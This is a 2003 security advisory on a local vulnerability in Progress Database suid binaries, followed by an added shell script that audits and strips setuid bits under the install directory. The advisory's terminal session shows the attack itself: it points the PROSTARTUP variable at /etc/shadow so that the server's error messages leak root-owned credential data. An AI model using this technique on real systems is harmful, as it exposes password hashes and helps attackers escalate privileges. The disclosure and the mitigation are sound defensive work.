
Progress PROSTARTUP Root Owned File Reading Vulnerability
Date: 2003-04-05

Author : KF <dotslash@snosoft.com>

Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com

Our Mission: ********************************************
Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer.

Quick Summary:
Advisory Number : SRT2003-04-02-1735
Product : Progress Database
Version : Versions 7 to 9
Vendor : progress.com
Class : local
Criticality : Medium to Low
Operating System(s) : Linux, SunOS, SCO, TRU64, *nix

High Level Explanation
High Level Description : Error messages can provide root owned data
What to do : chmod -s all suid binaries in /usr/dlc

Technical Details
Proof Of Concept Status : No PoC is needed.
Low Level Description :

The Progress Database reads configuration files as the root user. No checks are made to verify that the user running the program has permission to read the configuration file. A user can simply specify a root-owned file and cause an error message to be generated that reveals the file contents. Most versions beyond v6 appear to be affected.

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily, on the machine I chose to exploit, the line that was read from the shadow file did not have an encrypted hash. This, however, is not always the case.

Patch or Workaround : chmod -s all suid binaries in the $DLC folder
Vendor Status : vendor has been notified and is working on a fix
Bugtraq URL : to be assigned
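
The workaround above, as an added example that is not part of the original advisory: a POSIX shell script that lists the setuid/setgid files under the Progress install directory and, when told to apply, clears the bits. The function names and the dry-run/apply argument are assumptions of this example; /usr/dlc is the path the advisory names.

```sh
#!/bin/sh
# Added example, not from the advisory: audit and strip setuid/setgid bits
# under a Progress install directory. Function names and the "apply"
# argument are hypothetical; /usr/dlc is the path named in the advisory.

# list_suid DIR: print each regular file under DIR that is setuid or setgid.
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# strip_suid DIR [apply]
#   Default is a dry run: show each setuid/setgid file on stderr.
#   With "apply", also clear both bits (same effect as chmod -s).
#   Prints the number of files found on stdout; returns 2 if DIR is missing.
#   Assumes file names contain no newlines.
strip_suid() {
    dir=$1
    mode=${2:-dry-run}
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
    list_suid "$dir" | {
        count=0
        while IFS= read -r f; do
            count=$((count + 1))
            ls -ld "$f" >&2                      # owner and mode, for review
            if [ "$mode" = apply ]; then
                chmod u-s,g-s "$f" || echo "chmod failed: $f" >&2
            fi
        done
        echo "$count"
    }
}

# Run only when a directory is given, e.g.:
#   sh strip_suid.sh /usr/dlc          (dry run)
#   sh strip_suid.sh /usr/dlc apply    (as root)
if [ $# -gt 0 ]; then
    strip_suid "$@"
fi
```

Run the dry run first and keep its listing, so the original modes can be restored once a vendor fix is installed.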

This advisory was released by Secure Network Operations, Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.

